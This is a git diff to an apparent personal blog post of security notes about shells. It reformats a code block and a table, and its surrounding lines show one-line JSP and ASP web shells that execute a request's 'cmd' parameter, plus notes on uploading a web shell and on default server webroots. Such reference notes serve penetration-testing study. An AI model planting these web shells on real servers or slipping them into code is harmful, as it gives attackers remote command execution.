--- a/_posts/notes/system/2022-04-25-shell.md
+++ b/_posts/notes/system/2022-04-25-shell.md
@@ -140,14 +140,15 @@ This are some of the scripts to execute a web shell:
 <% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
 ```
 
-```asp
-<% eval request("cmd") %>
+```
+<% eval request("cmd") %> # asp
 ```
 
 ## Uploading the shell
 
 Firstly, we need to upload the webshell.
 Secondly, we need to figurate which type of server is:
+
 | **Server**   | **Default Webroot**    |
 |--------------- | --------------- |
 | Apache   | `/var/www/html/`{: .filepath}   |
